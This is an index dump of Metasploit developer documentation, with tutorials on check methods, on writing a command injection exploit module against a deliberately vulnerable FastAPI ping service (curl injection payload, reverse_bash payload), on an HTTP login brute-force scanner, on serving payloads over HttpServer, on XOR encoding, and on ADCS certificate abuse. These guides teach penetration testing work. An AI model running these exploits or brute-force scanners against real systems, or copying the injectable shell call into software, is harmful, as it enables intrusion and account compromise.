    "content": "Metasploit offers the possibility to automatically call the check method before the exploit or run method is run. Just prepend the AutoCheck module for this, nothing more: . prepend Msf::Exploit::Remote::AutoCheck . According to the CheckCode returned by the check method, the Framework will decide whether the module should be executed or not: . | CheckCode | Module executed? | . | Exploit::CheckCode::Vulnerable | yes | . | Exploit::CheckCode::Appears | yes | . | Exploit::CheckCode::Detected | yes | . | Exploit::CheckCode::Safe | no | . | Exploit::CheckCode::Unsupported | no | . | Exploit::CheckCode::Unknown | no | . This mixin brings two new options that let the operator control its behavior: . | AutoCheck: Sets whether or not the check method will be run. Default is true. | ForceExploit: Override the check result. The check method is run but the module will be executed regardless of the result. Default is false. | . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#autocheck-mixin",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#autocheck-mixin"
  },"422": {
    "doc": "How to write a check method",
    "title": "How to write a check method",
    "content": "In Metasploit, exploits and auxiliary modules support the check command, which allows the user to determine the vulnerable state before using the module. This feature is handy for those who need to verify the vulnerability without actually popping a shell, and can be used to quickly identify all vulnerable, or possibly exploitable, machines on the network. Although vulnerability checks aren’t the focus of Metasploit, because it isn’t a vulnerability scanner like Nexpose, we do actually encourage people to implement the check() method anyway to add more value to the module. If you do write one, make sure to keep these guidelines in mind: . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html"
  },"423": {
    "doc": "How to write a cmd injection module",
    "title": "A Vulnerable Service",
    "content": "For the vulnerable service test case, we’ll be using a simple FastAPI service. This is very easy to spin up: . | Install fastapi[all] using your preferred Python package manager (a virtual environment is recommended) | Create a file to hold some Python code (I’ll call it main.py) | Copy the following code into your file: . from fastapi import FastAPI, Response import subprocess app = FastAPI() @app.get(\"/ping\") def ping(ip : str): res = subprocess.run(f\"ping -c 1 {ip}\", shell=True, capture_output=True) return Response(content=res.stdout.decode(\"utf-8\"), media_type=\"text/plain\") . | Start your vulnerable service with uvicorn main:app | Test that the application works with curl: . $ curl http://localhost:8000/ping?ip=1.1.1.1 PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data. 64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms --- 1.1.1.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms . | Test that your application is exploitable - also with curl: . $ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data. 64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms --- 1.1.1.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms uid=1000(meta) gid=1000(meta) . | . With this output uid=1000(meta) gid=1000(meta), we know that the id command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-vulnerable-service",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-vulnerable-service"
  },"424": {
    "doc": "How to write a cmd injection module",
    "title": "The Structure of a Module",
    "content": "To have a functioning command injection Metasploit module we need a few things: . | Create a subclass of Msf::Exploit::Remote | Include the Msf::Exploit::Remote::HttpClient mixin | Define three methods: . | initialize, which defines metadata for the Module | execute_command, which is what runs the command against the remote server | exploit, wraps execute_command, and can handle some logic when we move to a cmdstager module | . | (Not required, but recommended) a method to substitute or escape bad characters, to be used inside execute_command. This could also just be done inside execute_command instead of a separate function call. | . Where to put a Module . Metasploit looks for custom modules at $HOME/.msf4/modules, but the way you get modules there varies based on how you’re running Metasploit. | If you have a full install of Metasploit on your host, you can just add your custom module to $HOME/.msf4/modules/exploits/custom_mod.rb. | You can also just add a module to Metasploit’s modules folder - This can be helpful when troubleshooting, but it’s not recommended | . | Docker If you’re using the Docker Image, you can also add modules to $HOME/.msf4/modules and that folder will be mounted as a volume inside the Docker container . | You can also change the mount point by modifying the docker-compose file | . | . For testing, the easiest thing to do is the simplest. You can find Metasploit’s exploit directory, copy a file, rename it, and go from there. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#the-structure-of-a-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#the-structure-of-a-module"
  },"425": {
    "doc": "How to write a cmd injection module",
    "title": "A Shell of a Module",
    "content": "The shell of a module that follows the above format is something like this: . class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) # empty for now end def filter_bad_chars(cmd) # empty for now end def execute_command(cmd, _opts = {}) # empty for now end def exploit # empty for now end end . This covers every essential point from The Structure of a Module, although it won’t run yet. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-shell-of-a-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#a-shell-of-a-module"
  },"426": {
    "doc": "How to write a cmd injection module",
    "title": "Initialize",
    "content": "The initialize method is used to define and pass metadata. Every initialize method in the metasploit-framework codebase follows the format of an empty info being passed into update_info, which gets passed to the Msf::Exploit::Remote initialize method: . def initialize(info = {}) super( update_info( info, # Here is where the metadata goes 'Name' => 'Command Injection against a test Ping endpoint', 'Description' => 'This exploits a command injection vulnerability against a test application', 'License' => MSF_LICENSE, 'Author' => 'YOUR NAME', 'References' => [ ['URL', 'https://metasploit.com/'] ], 'DisclosureDate' => '2023-08-04', 'Platform' => 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp 'Targets' => [ [ 'Unix Command', { 'Platform' => ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash', 'RPORT' => 8000, } } ] ], 'Payload' => { 'BadChars' => '\\x00', }, 'Notes' => { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } # Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module ) ) end . All that this method does is register metadata to the module. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#initialize",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#initialize"
  },"427": {
    "doc": "How to write a cmd injection module",
    "title": "Filtering",
    "content": "It’s important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the /ping endpoint that looks like /ping?ip=1.1.1.1&&id, you won’t see the “uid=1000(meta) gid=1000(meta)” in the response because & is a special character in HTTP query strings. Encoding requirements might change based on the application you’re trying to inject, so experiment if things aren’t working. def filter_bad_chars(cmd) return cmd .gsub(/&/, '%26') .gsub(/ /, '%20') end . filter_bad_chars takes in cmd, which is a string. cmd has two substitutions applied - the first will translate & to %26, the second translates a space to %20. The .gsub statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#filtering",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#filtering"
  },"428": {
    "doc": "How to write a cmd injection module",
    "title": "Execution",
    "content": "The execute_command method takes in cmd and _opts and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the /ping endpoint on our sample service. def execute_command(cmd, _opts = {}) send_request_cgi({ 'method' => 'GET', 'uri' => '/ping', 'encode_params' => false, 'vars_get' => { 'ip' => \"bing.com%20%26%26%20#{filter_bad_chars(cmd)}\", } }) end . We don’t even need to handle the output of send_request_cgi (Really, there should be no return until the shell exits, since the call to subprocess.run doesn’t return until that shell dies). ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#execution",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#execution"
  },"429": {
    "doc": "How to write a cmd injection module",
    "title": "Exploitation",
    "content": "To finish up, all we need is to define the exploit method. This method is called by Metasploit when you use run within a msfconsole. All that we’ll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well: . def exploit print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") execute_command(payload.encoded) end . If you’re running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire: . set RHOST 127.0.0.1 set LHOST 127.0.0.1 run . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#exploitation",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#exploitation"
  },"430": {
    "doc": "How to write a cmd injection module",
    "title": "Conclusion",
    "content": "That’s it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the How-to-use-command-stagers guide, add some logging to the Python web server, and watch executions over Wireshark. You’ll learn a lot. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#conclusion",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html#conclusion"
  },"431": {
    "doc": "How to write a cmd injection module",
    "title": "How to write a cmd injection module",
    "content": "If you’ve found a way to execute a command on a target, and you’d like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to fetch commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a Fetch Payload for a no-code solution. By the end of this guide you’ll understand how to turn Command injection into a shell - from here, you can move on to the command stager article and upgrade your basic :unix_cmd Target to a Dropper for all kinds of payloads with variable command stagers. This guide assumes some knowledge of programming (Understand what a class is, what methods/functions are) but expects no in-depth knowledge of Metasploit internals. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-cmd-injection-module.html"
  },"432": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 1: Set up your target environment",
    "content": "For our demonstration, we will be using Symantec Web Gateway. A trial is available at the vendor’s website. Obviously downloading/installing it would be your first step. ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-1-set-up-your-target-environment",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-1-set-up-your-target-environment"
  },"433": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 2: Set up a client",
    "content": "The purpose of setting up a client is to sample the login request and response. Normally you can do this with: . | A web browser plus a sniffer . | For the sniffer, you can download Wireshark, and have it running. | Use a web browser to login. | Go back to Wireshark and save the HTTP request, this is exactly what you will send in the login module. You will also need to save the HTTP response so that you can check for a successful and a failed login. | . | A browser with Burp . Burp is a tool for performing security testing of web applications. You can download the free version from the vendor’s website. In some cases, Burp is way better than a sniffer because you can modify HTTP requests, it’s also a very convenient way to capture HTTPS traffic. Here’s what you do. | Start Burp. | Configure your web browser’s proxy so Burp can forward traffic. | Use the web browser to login. | Go back to Burp, you can find the history of all the requests and responses. | . | . For our example, this is the request the browser sends to Symantec Web Gateway: . POST /spywall/login.php HTTP/1.1 Host: 192.168.1.176 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.176/spywall/login.php Cookie: PHPSESSID=otgam4mgjrl00h2esk3o2npt05 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 54 USERNAME=gooduser&PASSWORD=GoodPassword&loginBtn=Login . And this is the response Symantec Web Gateway returns for a successful login: . 
HTTP/1.1 302 Found Date: Tue, 12 May 2015 19:32:31 GMT Server: Apache X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=vmb56vhd7740oqcmth8cqtagq5; path=/; secure; HttpOnly Location: https://192.168.1.176/spywall/executive_summary.php Content-Length: 0 Keep-Alive: timeout=15, max=5000 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 . A failed login response is an HTTP 200 with the following message in the body: . We're sorry, but the username or password you have entered is incorrect. Please retype your username and password. The username and password are case sensitive. ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-2-set-up-a-client",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-2-set-up-a-client"
  },"434": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 3: Start with a LoginScanner template",
    "content": "Your login module mainly consists of three components: the LoginScanner portion, the auxiliary portion, and rspec. The actual HTTP requests and responses are handled in the LoginScanner portion, so we’ll start from there. Your most basic HTTP LoginScanner template will look like this: . require 'metasploit/framework/login_scanner/http' module Metasploit module Framework module LoginScanner class SymantecWebGateway < HTTP # Attempts to login to the server. # # @param [Metasploit::Framework::Credential] credential The credential information. # @return [Result] A Result object indicating success or failure def attempt_login(credential) end end end end end . Save it under lib/metasploit/framework/login_scanner/. The #attempt_login method . The #attempt_login method is called automatically. You can write your entire login code there, but it’s better to break it down into multiple methods so that the code is cleaner, and easier to document and rspec. Typically, all you want #attempt_login to do is focus on crafting the Result object, pass it to a custom #login routine, and then return the Result object. It almost always looks something like this: . def attempt_login(credential) # Default Result result_opts = { credential: credential, status: Metasploit::Model::Login::Status::INCORRECT, proof: nil, host: host, port: port, protocol: 'tcp' } # Merge login result # credential.public is the username # credential.private is the password result_opts.merge!(do_login(credential.public, credential.private)) # Return the Result object Result.new(result_opts) end . Notice that: . | By default, our proof is nil. | The status is Metasploit::Model::Login::Status::INCORRECT. | We’re calling #do_login, which is our custom login method. | The #do_login method will have to update status and proof before we return the Result object. | . The custom login method . Ok, now let’s talk about building this #do_login method. 
This is where we send the same HTTP request we sampled earlier. If you’re already familiar with writing a Metasploit module that sends an HTTP request, the first thing that comes to mind is probably using the HttpClient. Well, you can’t do that at all over here, so we have to fall back to Rex::Proto::Http::Client. Fortunately for you, we made all this a little bit easier by creating another method called #send_request, here’s an example of how to use that: . send_request({'uri'=>'/'}) . You will rely on this method a lot to accomplish most of what you need to do here. Ok, now, let’s move on and talk about how to use #send_request to send a login request. Remember in the login request, there is actually a PHPSESSID cookie, you should obtain this first. Usually the web application will give you the session cookie when you request the login page for the very first time, and this happens a lot. Here’s an example of how to grab PHPSESSID: . def get_session_id login_uri = normalize_uri(\"#{uri}/spywall/login.php\") res = send_request({'uri' => login_uri}) sid = res.get_cookies.scan(/(PHPSESSID=\\w+);*/).flatten[0] || '' return sid end . Now that you have a session ID, you can finally make the login request. Remember in the sample, we have to submit the username, password, loginBtn as a POST request. So let’s do that with #send_request: . protocol = ssl ? 'https' : 'http' peer = \"#{host}:#{port}\" login_uri = normalize_uri(\"#{uri}/spywall/login.php\") res = send_request({ 'uri' => login_uri, 'method' => 'POST', 'cookie' => get_session_id, 'headers' => { 'Referer' => \"#{protocol}://#{peer}/#{login_uri}\" }, 'vars_post' => { 'USERNAME' => username, 'PASSWORD' => password, 'loginBtn' => 'Login' # Found in the HTML form } }) . Now that the request is sent, we need to check the response (the res variable). Typically, you have a few choices to determine a successful login: . 
| Check the HTTP response code. In this case, we have a 302 (redirect), but know that sometimes the response code can lie so this should not be your first choice. | Check the HTML. With some web applications, you might get a “successful login” message, and you can regex that. This is most likely the most accurate way. | Check the location header. In our case, Symantec returns a 302 and contains no body. But it redirects us to a spywall/executive_summary.php page in the location header, so we can use that. We can also try to access executive_summary.php with a renewed session ID, and make sure we can actually see the admin interface, but requesting an extra page adds more penalty to performance, so this is up to you. | . In the end, your custom login method will probably look something like this: . def do_login(username, password) protocol = ssl ? 'https' : 'http' peer = \"#{host}:#{port}\" login_uri = normalize_uri(\"#{uri}/spywall/login.php\") res = send_request({ 'uri' => login_uri, 'method' => 'POST', 'cookie' => get_session_id, 'headers' => { 'Referer' => \"#{protocol}://#{peer}/#{login_uri}\" }, 'vars_post' => { 'USERNAME' => username, 'PASSWORD' => password, 'loginBtn' => 'Login' # Found in the HTML form } }) if res && res.headers['Location'].include?('executive_summary.php') return {:status => LOGIN_STATUS::SUCCESSFUL, :proof => res.to_s} end {:proof => res.to_s} end . The exact statuses you can return are: . | Constant | Purpose | . | Metasploit::Model::Login::Status::DENIED_ACCESS | Access is denied | . | Metasploit::Model::Login::Status::DISABLED | Account is disabled | . | Metasploit::Model::Login::Status::INCORRECT | Credential is incorrect | . | Metasploit::Model::Login::Status::LOCKED_OUT | Account has been locked out | . | Metasploit::Model::Login::Status::NO_AUTH_REQUIRED | No authentication | . 
| Metasploit::Model::Login::Status::SUCCESSFUL | Successful login | . | Metasploit::Model::Login::Status::UNABLE_TO_CONNECT | Unable to connect to the service | . | Metasploit::Model::Login::Status::UNTRIED | Credential has not been tried | . | Metasploit::Model::Login::Status::ALL | All the above (An array) | . When you’re done, your code will look something like this: . https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/symantec_web_gateway.rb . ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-3-start-with-a-loginscanner-template",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-3-start-with-a-loginscanner-template"
  },"435": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Step 4: Write the auxiliary module",
    "content": "The auxiliary module acts more like a user interface: it describes what the module does, handles options, initializes objects, and does reporting. A basic auxiliary module template in our case would be something like this: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/login_scanner/symantec_web_gateway' require 'metasploit/framework/credential_collection' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize(info = {}) super( update_info( info, 'Name' => 'Symantec Web Gateway Login Utility', 'Description' => %q{ This module will attempt to authenticate to a Symantec Web Gateway. }, 'Author' => [ 'sinn3r' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SSLVersion' => 'TLS1' } ) ) end def run_host(ip) end end . Save it under modules/auxiliary/scanner/http/. Our main method is #run_host, so we’ll begin there. But before we do, we must initialize the LoginScanner object. The following is an example of how you will probably write it. def scanner(ip) @scanner ||= lambda { cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'] ) return Metasploit::Framework::LoginScanner::SymantecWebGateway.new( configure_http_login_scanner( host: ip, port: datastore['RPORT'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], bruteforce_speed: datastore['BRUTEFORCE_SPEED'], connection_timeout: 5 )) }.call end . 
Notice that this scanner method can be called multiple times, but the use of lambda will allow the LoginScanner object to initialize only once. After that first time, every time the method is called, it will just return @scanner instead of going through the whole initialization process again. In some cases you might need to pass more datastore options, maybe not. For example, if you want to allow the URI to be configurable (which is also already an accessor in Metasploit::Framework::LoginScanner::HTTP), then you have to create and pass datastore['URI'] to configure_http_login_scanner too, like so: . uri: datastore['URI'] . And then in your LoginScanner, pass uri to #send_request: . send_request({'uri'=>uri}) . At this point, the scanner method holds our Metasploit::Framework::LoginScanner::SymantecWebGateway object. If we call the #scan! method, it will trigger the #attempt_login method we wrote earlier, and then yield the Result object. Basically like this: . scanner(ip).scan! do |result| # result = Our Result object end . With the Result object, we can start reporting. In most cases, you will probably be using #create_credential_login to report a successful login, and #invalidate_login to report a bad one. Reporting a valid credential . The credential API knows a lot about a credential, such as when it was used, how it was used, the service tried, target IP, port, etc. So when we report, that’s how much information we are storing for every credential. To make credential reporting easy to use, all you need to do is call the #store_valid_credential method like this: . store_valid_credential( user: result.credential.public, private: result.credential.private, private_type: :password, # This is optional proof: nil, # This is optional ) . Report an invalid credential . Here’s another example you can use: . # Reports a bad credential. 
# # @param [String] ip Target host # @param [Integer] rport Target port # @param [Result] result The Result object # @return [void] def report_bad_cred(ip, rport, result) invalidate_login( address: ip, port: rport, protocol: 'tcp', public: result.credential.public, private: result.credential.private, realm_key: result.credential.realm_key, realm_value: result.credential.realm, status: result.status, proof: result.proof ) end . At this point, you’re pretty much done with the auxiliary module. It will probably look something like this: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb . ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-4-write-the-auxiliary-module",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#step-4-write-the-auxiliary-module"
  },"436": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Test",
    "content": "And finally, make sure your module actually works. Test for a successful login: . msf auxiliary(symantec_web_gateway_login) > run [+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(symantec_web_gateway_login) > . Test for a failed login: . msf auxiliary(symantec_web_gateway_login) > run [-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(symantec_web_gateway_login) > . ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#test",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html#test"
  },"437": {
    "doc": "Writing a HTTP LoginScanner",
    "title": "Writing a HTTP LoginScanner",
    "content": "This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs. Before we begin, it’s probably a good idea to read Creating Metasploit Framework LoginScanners, which explains about the APIs in-depth. The LoginScanner API can be found in the lib/metasploit/framework/loginscanner directory, and the Credential API can found as a metasploit-credential gem here. You will most likely want to read them while writing the login module. ",
    "url": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html",
    "relUrl": "/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html"
  },"438": {
    "doc": "How to write a module using HttpServer and HttpClient",
    "title": "How to write a module using HttpServer and HttpClient",
    "content": "Using multiple networking mixins in a Metasploit module is always a tricky thing to do, because most likely you will run into issues like overlapping datastore options, variables and methods, or a super call that is only meant for one mixin. This is considered advanced module development, and it can be rather painful to figure out on your own. To improve the Metasploit development experience, we have a few examples to demonstrate common scenarios that require you to use multiple mixins to achieve exploitation. Today’s lesson: Send an HTTP request to attack the target machine, and use an HttpServer for payload delivery. Say you want to exploit a web server or web application. You have code execution on the box, but you need to find a way to deliver the final payload (probably an executable), and an HTTP server happens to be your option. Here is how you can set it up: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super( update_info( info, 'Name' => 'HttpClient and HttpServer Example', 'Description' => %q{ This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time, but this allows the HttpServer to terminate after a delay. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r' ], 'References' => [ ['URL', 'http://metasploit.com'] ], 'Payload' => { 'BadChars' => \"\\x00\" }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], ], 'Privileged' => false, 'DisclosureDate' => '2013-12-09', 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'The path to some web application', '/']), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) ], self.class ) end def on_request_uri(cli, req) print_status(\"#{peer} - Payload request received: #{req.uri}\") send_response(cli, 'You get this, I own you') end def primer print_status(\"Sending a malicious request to #{target_uri.path}\") send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) end def exploit Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error # When the server stops due to our timeout, this is raised end end . Here’s what happens when you run the above example: . | The super call wrapped in the Timeout block will start the web server. | Before the web server is in the infinite loop state, the primer() method is called, which is where you send your malicious requests to get code execution. | Your HttpServer serves the final payload upon request. | After 10 seconds, the module raises a Timeout exception. The web server finally terminates. | . In case you’re wondering why the web server must terminate after a period of time, this is because if the module fails to gain code execution on the target machine, obviously it will never ask your web server for the malicious payload, therefore there is no point in keeping it alive forever. Typically it shouldn’t take a very long time to get a payload request, either, so we keep the timeout short. The output for the above example should look something like this: . 
msf exploit(test) > run [*] Exploit running as background job. [*] Started reverse handler on 10.0.1.76:4444 [*] Using URL: http://0.0.0.0:8080/SUuv1qjZbCibL80 [*] Local IP: http://10.0.1.76:8080/SUuv1qjZbCibL80 [*] Server started. [*] Sending a malicious request to / msf exploit(test) > [*] 10.0.1.76 test - 10.0.1.76:8181 - Payload request received: /SUuv1qjZbCibL80 [*] Server stopped. msf exploit(test) > . Related Articles: . | How to Send an HTTP Request Using HTTPClient | How to write a browser exploit using HttpServer | https://community.rapid7.com/community/metasploit/blog/2012/12/17/metasploit-hooks | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-write-a-module-using-httpserver-and-httpclient.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-write-a-module-using-httpserver-and-httpclient.html"
  },"439": {
    "doc": "XOR Support",
    "title": "How to XOR with Metasploit::Framework::Compiler",
    "content": "The Metasploit C compiler has built-in support for XOR encoding and decoding, which is implemented as the xor.h header. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#how-to-xor-with-metasploitframeworkcompiler",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#how-to-xor-with-metasploitframeworkcompiler"
  },"440": {
    "doc": "XOR Support",
    "title": "Code Example",
    "content": "#include <Windows.h> #include <String.h> #include <xor.h> int main(int args, char** argv) { char* xorStr = \"NNNN\"; char xorKey = 0x0f; LPVOID lpBuf = VirtualAlloc(NULL, sizeof(int) * strlen(xorStr), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memset(lpBuf, '\\0', strlen(xorStr)); xor((char*) lpBuf, xorStr, xorKey, strlen(xorStr)); MessageBox(NULL, lpBuf, \"Test\", MB_OK); return 0; } . To compile, use Metasploit::Framework::Compiler::Windows.compile_c . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html#code-example"
  },"441": {
    "doc": "XOR Support",
    "title": "XOR Support",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-xor-with-metasploit-framework-compiler.html"
  },"442": {
    "doc": "Zip",
    "title": "How to zip files with Msf::Util::EXE.to_zip",
    "content": "Compressing files into zip format is very easy with Metasploit. For most purposes, you can use Msf::Util::EXE.to_zip() to compress data into a zip file. Note that the former Rex::Zip::Archive() should no longer be used. ",
    "url": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#how-to-zip-files-with-msfutilexeto_zip",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#how-to-zip-files-with-msfutilexeto_zip"
  },"443": {
    "doc": "Zip",
    "title": "Usage:",
    "content": "files = [ {data: 'AAAA', fname: 'test1.txt', comment: 'my comment'}, {data: 'BBBB', fname: 'test2.txt'} ] zip = Msf::Util::EXE.to_zip(files) . If saved as a file, the above example will extract to the following: . $ unzip test.zip Archive: test.zip extracting: test1.txt extracting: test2.txt . ",
    "url": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#usage",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html#usage"
  },"444": {
    "doc": "Zip",
    "title": "Zip",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-zip-files-with-msf-util-exe-to_zip.html"
  },"445": {
    "doc": "Request certificates",
    "title": "Vulnerable Application",
    "content": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate template’s configuration the resulting certificate can be used for various operations such as authentication. PFX certificate files that are saved are encrypted with a blank password. This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#vulnerable-application",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#vulnerable-application"
  },"446": {
    "doc": "Request certificates",
    "title": "Module usage",
    "content": ". | From msfconsole | Do: use auxiliary/admin/dcerpc/icpr_cert | Set the CA, RHOSTS, SMBUser and SMBPass options | Run the module and see that a new certificate was issued or submitted | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/icpr_cert.html#module-usage",
